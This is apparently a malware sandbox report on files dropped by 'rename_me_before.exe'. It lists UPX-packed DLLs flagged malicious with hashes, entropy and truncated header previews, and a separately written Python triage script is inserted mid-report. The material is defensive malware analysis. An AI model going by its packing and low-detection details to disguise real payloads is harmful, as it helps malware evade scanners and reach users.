• Antivirus: ReversingLabs, Detection: 0%
Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 109336
Entropy (8bit): 7.933037133644081
Encrypted: false
SSDEEP: 1536:JOt51H+NnBZBmb1fZGlHc9ye/U65Qka1RkT1IJ5NrIecwgWN/xiNIVOqHC07SyiY:czanBZkGlmRc1en8R/iIVOqHC0r
MD5: D967BEA935300A9DA0CD50BF5359A6EA
SHA1: 4C2FD9A31AABC90172D41979FB64385FDA79C028
SHA-256: 4B312A03C3A95BD301F095AB4201E2998A3C05E52FCD16C62AB1E51341F54AF2
SHA-512: 7BAA39A35BEAD863833EFD7519C761E8CD4E15B35825427CF654181534F41C9ABCDD85E017DAEB9AFEFE291D6C2741505BF7EEF30D4D25D53ADA82646857F356
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36632
                                                                                                                                                                                                                                                          Entropy (8bit):7.654026577022311
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:x35lZrQBDJLFSRN0cp71I6Pm9zje2pojcIVOI8a5YiSyvELAMxkE1R1:N5YbLkfzpIwm9zK1jcIVOI847SyMrxZz
                                                                                                                                                                                                                                                          MD5:BEAC22863EE05D291190B6ABF45463C0
                                                                                                                                                                                                                                                          SHA1:94CC19E31E550D7FD9743BBD74BFE0217CDDE7F9
                                                                                                                                                                                                                                                          SHA-256:C1C3856EE8E86C8E5CF2B436C1426067F99A40C0DA4CBEA4E0B52582CD7B6B5B
                                                                                                                                                                                                                                                          SHA-512:8AE651B912C0F9F2C431A4D3F1C769746F787BDD70CE53626106C903CB3F364CB1BAE7E6E2476868420ABD849A990C5604C533BC64B0EBA149F6BC36514A6F66
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(t..F'..F'..F'..'..F'u.G&..F'u.C&..F'u.B&..F'u.E&..F'..G&..F'..G&..F'..G'B.F'..K&..F'..F&..F'...'..F'..D&..F'Rich..F'................PE..d......e.........." ...#.P...........!.......................................@............`.........................................|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):87832
                                                                                                                                                                                                                                                          Entropy (8bit):7.91494851779059
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:0ZMcTNiSSlZFto5ChAwRYMekiq/xFQhIHFB38EtW9ue20dcwfgpPzLNLJcIVZ1Ch:kTJitRLeZq/fZH3Ns9D2WcGgthLGIVZI
                                                                                                                                                                                                                                                          MD5:872FEA740D2AE4D8B9BB2AC95059F52B
                                                                                                                                                                                                                                                          SHA1:22274E636E2EF57AD16CCF0EB49A2FF3E37BA080
                                                                                                                                                                                                                                                          SHA-256:C9A4162DF80A99E4723DD60BDF34B8FEFC4005F7865DC3E6D86833D84FA25DA2
                                                                                                                                                                                                                                                          SHA-512:F85D1B6602826B21F12A873176F7A5C857C3213AE329ED7A0B8F7D9B1A791EDC5549D8FCE3C5D2305CE40A4D8A57D9845B2956D42D374DE78D5324703D5DFA03
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T"#.5Lp.5Lp.5Lp.M.p.5Lp.IMq.5Lp.IIq.5Lp.IHq.5Lp.IOq.5LpnHMq.5Lp.MMq.5Lp.5Mp.5LpnHAq.5LpnHLq.5LpnH.p.5LpnHNq.5LpRich.5Lp................PE..d......e.........." ...#. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):27416
                                                                                                                                                                                                                                                          Entropy (8bit):7.512035788996596
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Sy6HNbprWpwDXIVWt835YiSyvE+OAMxkEO:y99DXIVWt8p7Sy18xK
                                                                                                                                                                                                                                                          MD5:EAAADF40DD833D09BC92D6222AEB2F14
                                                                                                                                                                                                                                                          SHA1:CFE29566262367FCF7822DE328AF95B386D96A2D
                                                                                                                                                                                                                                                          SHA-256:F7D615C6FC3AC5201AB2B369FD7E0443967DC132EE5FC981ACB07BF8DC4697CB
                                                                                                                                                                                                                                                          SHA-512:8216324A30CC66B7BC51C4A96CE0B8F5AD563025E59CF1BF457A84076DC8E8A0291C8A6FCE6DC19EC3877D2DBAA9BBAF5CC1D34553FD3423A258B51EA4D40F70
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-*.yCy.yCy.yCy...y.yCy'.Bx.yCy'.Fx.yCy'.Gx.yCy'.@x.yCyA.Bx.yCy.yBy.yCy..Bx.yCyA.Nx.yCyA.Cx.yCyA..y.yCyA.Ax.yCyRich.yCy................PE..d......e.........." ...#.0..........`.....................................................`.........................................4...`....................`......................................................p...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):33048
                                                                                                                                                                                                                                                          Entropy (8bit):7.646550525853649
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:C1y7LmeBIEqqupNjRIVXtM75YiSyvw5AMxkEfEk:XvmeBI9jRIVXtMF7Sy4hxjEk
                                                                                                                                                                                                                                                          MD5:DBE30CE23B5F19E1B6516653BC6692FC
                                                                                                                                                                                                                                                          SHA1:9E46EA221793EAB9256E7425C8143323640259E1
                                                                                                                                                                                                                                                          SHA-256:67D476307C3AE5FFD221C67F26FC76CE2CF5B97B91F32028A7549D131E33454A
                                                                                                                                                                                                                                                          SHA-512:2B0F9E2E0DCE0E87E240ACF874E0399249C6BAA35382D50D2F68989942E81D038D5BB9B734B313339C9F2DF175A8319683671EA58997097AEC667597024E2338
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}!{..O(..O(..O(.d.(..O(W`N)..O(W`J)..O(W`K)..O(W`L)..O(1aN)..O(..N(..O(.dN)..O(.dK)..O(1aB)..O(1aO)..O(1a.(..O(1aM)..O(Rich..O(................PE..d......e.........." ...#.P..........p........................................ ............`.........................................x...X...............................................................................@...........................................UPX0....................................UPX1.....P.......B..................@....rsrc................F..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):26392
                                                                                                                                                                                                                                                          Entropy (8bit):7.484232189428478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:P1ihFuym2pDjIVQU8v5YiSyvyxAMxkE44:EXmqjIVQU8B7Sy+xE4
                                                                                                                                                                                                                                                          MD5:C3CEA46D675E3F2A00F7AF212521C423
                                                                                                                                                                                                                                                          SHA1:0A7C76039E0ED61E3853C4C553BB6CFC9CBD2C7C
                                                                                                                                                                                                                                                          SHA-256:02B62AEE4867505E3D12A3ABD0288CF7A75658AC908D06F5B24FDB178094E29D
                                                                                                                                                                                                                                                          SHA-512:8D9AF1D88A2A9528096388DB3BD4FF8ADD480EF94689E851FA4C5A68EC9B97C561B2EDFC7E34061BEB7BCC26B884A0A06AF196008D8705D0284B22878C95289E
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:WX.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.L[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........PE..d......e.........." ...#.0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44312
                                                                                                                                                                                                                                                          Entropy (8bit):7.717509871918743
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wAQ8MABQVaAwmySb0TrgeBYdEpZbqIVLwJF65YiSyvTAMxkEY:wATIzwF/JbqIVLwJFY7SyLxU
                                                                                                                                                                                                                                                          MD5:9505AFE166EB419F5A1D33FF1254722E
                                                                                                                                                                                                                                                          SHA1:F343D7B444EB58033086DE5376725DEDA5E0E418
                                                                                                                                                                                                                                                          SHA-256:AF42A1C35155EB989332C25A81D6E2ED08D8E33718D18D32BA5B00092F2A0F21
                                                                                                                                                                                                                                                          SHA-512:46B7C86D3384DB9ADB8F1F52B83AAAC398547AB86BC07800B0EB87E9ABEB9D97E24FB8A70F01224D7C4E8A2A532D9353AD1C1F91D0416B429B87EE0EBE1DAEC4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.+.".E.".E.".E.+...$.E...D. .E...@./.E...A.*.E...F.!.E...D. .E.".D...E.i.D.%.E...H.#.E...E.#.E....#.E...G.#.E.Rich".E.........................PE..d......e.........." ...#.p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
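Every dropped DLL in the records above shows the same packing signature: "Entropy (8bit)" between 7.4 and 7.92, section names UPX0/UPX1/.rsrc in the PE header, and a "4.20.UPX!" marker at the end of the preview, while ReversingLabs reports 0% detection. The Python script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it computes the same 8-bit Shannon entropy, reads the section names out of a PE header, and flags a file as likely packed when UPX section names or the UPX! marker are present or entropy exceeds 7.0 (the 7.0 threshold is an assumption of this example). The two PE images it inspects are constructed in the script with a minimal PE32+ layout; they are not the report's dropped files.

```python
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the scale used by
    the report's 'Entropy (8bit)' field. UPX-compressed sections push a file
    towards 8.0 because compressed bytes are close to uniformly distributed."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table and
    return the section names. Returns [] for anything that is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4                      # 20-byte COFF file header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size             # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40                 # each IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes, entropy_threshold: float = 7.0) -> dict:
    """Summarise one dropped file the way an analyst would read the report record."""
    names = pe_section_names(data)
    ent = shannon_entropy(data)
    upx = any(n.startswith("UPX") for n in names) or b"UPX!" in data
    return {
        "entropy": round(ent, 3),
        "sections": names,
        "upx": upx,
        "likely_packed": upx or ent > entropy_threshold,
    }


def build_constructed_pe(section_names: list, payload: bytes) -> bytes:
    """Constructed, non-functional PE32+ image used only as sample input
    (assumption of this example; it is not one of the report's dropped DLLs)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after DOS header
    # Machine=AMD64, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader=0xF0, Characteristics=DLL|EXECUTABLE|LARGE_ADDRESS_AWARE
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 0xF0, 0x2022)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)    # PE32+ magic
    secs = b"".join(struct.pack("<8s", n.encode("ascii")) + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + secs + payload


# Constructed samples: a UPX-style image with a near-uniform payload and a
# plain image with a highly repetitive payload.
PACKED_SAMPLE = build_constructed_pe(["UPX0", "UPX1", ".rsrc"], bytes(range(256)) * 8 + b"4.20\0UPX!")
PLAIN_SAMPLE = build_constructed_pe([".text", ".rdata", ".data"], b"A" * 2048)


if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, triage(blob))
```

Run on real dropped files, `triage(open(path, "rb").read())` gives the entropy and section list to compare against the report; a UPX0/UPX1 layout with entropy above 7 and 0% scanner detection is exactly the combination worth unpacking (`upx -d`) and rescanning rather than trusting the detection count.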
Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 57624
Entropy (8bit): 7.832914003064299
Encrypted: false
SSDEEP: 1536:1w9DUaMjfQ0G17k3Gq+m3SvZ6XhH60CSLMIVOQZu7Sypx/:GzMjYfwPzR60qIVOQZuB
MD5: 83D8256BC4B9F1FA9FE3B79196166074
SHA1: 2F05420A7C663855F5290FB88CC20A15A7870090
SHA-256: F63E3BCAD55EF5F5E42076E12730F51BC5B4F3890EB0632A36D2755C5457A57A
SHA-512: A2E55D4A1A7CA4239E20FAAD4CBB9591C91E245C0D8FCCB01B898DF1C5C4D28010D378B00EC3ABBF973D87F874BB77C02FE0F5D471D47D513A93A4D3C54C94A3
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.g...g...g.......g.......g.....g.......g.......g.......g..q....g.......g...g...f..q....g..q....g..q..g..q....g..Rich.g..........................PE..d......e.........." ...#.........`.. ....p...................................0............`..........................................+..P....)....... .......................+..$................................... ...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 66840
Entropy (8bit): 7.864649468753277
Encrypted: false
SSDEEP: 1536:fbCYwNqce1LbV8uQvTLwNsDgzg+JR15xzf5/5JrwIVC7y3S7Syykx0:fuYwNABQQxzhRTxTx5JcIVC7yCa
MD5: D8567F88C0C935C77D2258C7C9DB4CA4
SHA1: 1DECC299B3E58F8401264354F3874DD2F0D7CD0A
SHA-256: 9A7E02CF4C66CC6BE6B2BF03282B4D88F16D12EB10EA78F36CDCE0776F6A6289
SHA-512: FAA5067C4ED2143D316ABF96AE096A1229B7450C9D3A850C496B484794897B246C59716F096806982D9C74CB3799A94C8DDCE646EB990CA89086F8D16D4C5EA9
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.+.4.x.4.x.4.x.L)x.4.x.H.y.4.x.H.y.4.x.H.y.4.x.H.y.4.xiI.y.4.x.4.x>5.x.L.y.4.xiI.y.4.xiI.y.4.xiIEx.4.xiI.y.4.xRich.4.x................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... .......................,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 25368
Entropy (8bit): 6.628339287223099
Encrypted: false
SSDEEP: 384:lCfwFpEWjfivQpIVZwobHQIYiSy1pCQFjzuAM+o/8E9VF0NySoJ:4qpEI4QpIVZwg5YiSyvgAMxkE7
MD5: 3A09B6DB7E4D6FF0F74C292649E4BA96
SHA1: 1A515F98946A4DCCC50579CBCEDF959017F3A23C
SHA-256: FC09E40E569F472DD4BA2EA93DA48220A6B0387EC62BB0F41F13EF8FAB215413
SHA-512: 8D5EA9F7EEE3D75F0673CC7821A94C50F753299128F3D623E7A9C262788C91C267827C859C5D46314A42310C27699AF5CDFC6F7821DD38BF03C0B35873D9730F
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<p.R#.R#.R#...#.R#i.S".R#i.W".R#i.V".R#i.Q".R#..S".R#..S".R#.S#..R#..Z".R#..R".R#...#.R#..P".R#Rich.R#........................PE..d......e.........." ...#.....&...... ........................................p............`.........................................`)..L....)..x....P.......@.......4.../...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 27136
Entropy (8bit): 7.6999639678226925
Encrypted: false
SSDEEP: 768:n7zv9jtkqp8io9lh7cX4fxHCWCvbRQupH:nPvo0q9lZcixHAjRQ2
MD5: CFCE0B2CFA84C1B1364912E4BFA854F0
SHA1: 92DDADB37B87F54C2C1A244CAB0B51B6FB306EC3
SHA-256: 4C173E67E018DB851A1CCBB21D9163C05B11445BBEEA44E433BFE3B900C82E9C
SHA-512: 932A0CD07B815B5CFA460651C058443454313DE96C694842E0D22BBFBAD3EF2B044624E689DEDE8409182CDDB77583DE22AB2C1FDBE48E69EF4EBD390BF80781
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..X.ux..ux..ux......ux...y..ux.Y.y..ux...}..ux...|..ux...{..ux.(.y..ux..uy..ux.}.p..ux.}.x..ux.}...ux.}.z..ux.Rich.ux.................PE..d......f.........." ...&.p...........C.......................................p............`.........................................@b..`....`..P....`.......................b..$....................................O..@...........................................UPX0....................................UPX1.....p.......b..................@....rsrc........`.......f..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 82432
Entropy (8bit): 7.940505498404618
Encrypted: false
SSDEEP: 1536:+3cl1ibnnh5z7R7rXgoGM0yiSwlwm0eumMbNZPw4BfmLNKalbgEM9xI:+s1ibnnXz7x3GXFSTvegbNVw
MD5: 8FA0C4C34AE5B6BB30F9E063C0D6FF74
SHA1: 81172F9EEB5BA03575232D6C58EE1EC5488B53A2
SHA-256: 89651D43C08734E0B06C9869446461D815EA0D59DCAFDCE340920267108DD218
SHA-512: F4E122B46E364711BC2CDA034C845369673A2D62B9F2628685E420AE8697FA42CE9E2F678F9030703ECF24FBFCD6CC3E8F7D23ABA5F127C27D679051D8DB1F62
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$...`.Q`.Q`.Qi.0Qf.QfK.Pb.Q+..Pb.QZJ.Pc.Q`.Q..QfK.Pl.QfK.Ph.QfK.Pd.Q.K.Pe.Q.K.Pa.Q.K\Qa.Q.K.Pa.QRich`.Q................PE..d......f.........." ...&.@.......p........................................................`..................................................................@..............\...........................................@...........................................UPX0.....p..............................UPX1.....@.......6..................@....rsrc................:..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

Process: C:\Users\user\Desktop\rename_me_before.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 25088
Entropy (8bit): 7.667591497071085
Encrypted: false
SSDEEP: 384:hTngUVq/M8o0HBUR5Tf490V7w1OMcAwGTtpOnWJKa5yj8pWeh9LWwhTFtSF5XXtt:Zg210+LGcAwU3KyyAt9NTFtSFpTpe
MD5: 5588BE68B4025D1F7D44055A4A5BFB3B
SHA1: 720AC28B851B3B50B058813C67C364DE2EE05CB3
SHA-256: DD82DAAAEF6677270B80EA23D8DD9BBB62BC8208C2F243E52ABF97751FC94F48
SHA-512: CDF635F191F5994F4E4CC5373B964A5DB674ABEA144A36492A958B0181B85C85BFED0162EB85D130F822E0D6B0F2180144920DEC356659AD47E475AE70AC9BB1
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f..T"ux."ux."ux.+... ux.$.y. ux.i.y. ux.$.}..ux.$.|.*ux.$.{.!ux...y.!ux."uy..ux.M.p.#ux.M.x.#ux.M..#ux.M.z.#ux.Rich"ux.........PE..d......f.........." ...&.`...........k... ................................................`.........................................@...h.......P............ ..$....................................................w..@...........................................UPX0....................................UPX1.....`... ...Z..................@....rsrc................^..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19968
                                                                                                                                                                                                                                                          Entropy (8bit):7.5808234342652385
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:kC4vtZ/HMOxAOJAslYzehJIjcf3qkcxXUZnv65wjya9m+WvX/Za7gJXDF:I3MVOrYqbIje54532Yvpz
                                                                                                                                                                                                                                                          MD5:6AF681A880D0B41EC16D38F8D7603578
                                                                                                                                                                                                                                                          SHA1:BE92C953F7B4F19763AC768EE961933051E6FCB0
                                                                                                                                                                                                                                                          SHA-256:1211EB2986835D195BC7B80E16F03D5891D7088FE0C3EF19C41C55C517A4082E
                                                                                                                                                                                                                                                          SHA-512:5A38DB40A7A0540D77618D3DCD2CCCACC9EC3A4C4084BDD113ABABDDFC0271F392D0356F0310E6850FC919B5A02099CCE9B2A1490E79CA427784824F188A80C4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..[.ux..ux..ux......ux...y..ux.Y.y..ux...}..ux...|..ux...{..ux.(.y..ux..uy..ux.}.p..ux.}.x..ux.}...ux.}.z..ux.Rich.ux.................PE..d......f.........." ...&.P..........`.....................................................`.........................................@...d.......P...............4...................................................`...@...........................................UPX0....................................UPX1.....P.......F..................@....rsrc................J..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (367)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9531
                                                                                                                                                                                                                                                          Entropy (8bit):5.159292758435694
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:LisUYxxPRtXLt5D6kyEqOmoKTYoEJdQ/0GmlWEx+VqAJk6O8mEISuJ5LdYDE:LisTdHyEqHoKtgAml9rAvOsFuJ5L2DE
                                                                                                                                                                                                                                                          MD5:E32D387A89F0114B8F9B9A809905299D
                                                                                                                                                                                                                                                          SHA1:A055C9FBF5416C83D5150D49CA16C58762B8B84A
                                                                                                                                                                                                                                                          SHA-256:5B0BC6ECE1F22A310FA72154642098B759F413F09CA9D45BEDB96218475C9BE0
                                                                                                                                                                                                                                                          SHA-512:6EEE3E19AF46A79E2110678F8D3D15EA4B2EB1355D0FC9581DA2C8E91D28926A2771394EA447E15CBC311A9DD9DE2A20E2AC0E0ABF9DB6D4D51982199A12E881
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: attrs.Version: 23.2.0.Summary: Classes Without Boilerplate.Project-URL: Documentation, https://www.attrs.org/.Project-URL: Changelog, https://www.attrs.org/en/stable/changelog.html.Project-URL: GitHub, https://github.com/python-attrs/attrs.Project-URL: Funding, https://github.com/sponsors/hynek.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi.Author-email: Hynek Schlawack <hs@ox.cx>.License-Expression: MIT.License-File: LICENSE.Keywords: attribute,boilerplate,class.Classifier: Development Status :: 5 - Production/Stable.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Languag
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3555
                                                                                                                                                                                                                                                          Entropy (8bit):5.799512812060909
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:QixWFmx02/o/+chE6dwB1NbXmUuAqG2WXJARGD+qLtxO:qMJchiRXnuA/XJSiO
                                                                                                                                                                                                                                                          MD5:0461AB56C7D588C2D9596F91E16658EC
                                                                                                                                                                                                                                                          SHA1:013E2923CAC817D68EE9ECF9A812E41707C4C7FD
                                                                                                                                                                                                                                                          SHA-256:A6DE30062543C20B137871403F784F12622118583313E9288A9389C005DE59AF
                                                                                                                                                                                                                                                          SHA-512:DD217FCCDD005EC00C34621EDD879A6DAC57F11065DDD628D0166FC3F2D78F32E282CCA86AEAB71D80928D834657A1E1D8D704F2A3BEF98410EE2D2E614A9590
                                                                                                                                                                                                                                                          Malicious:false
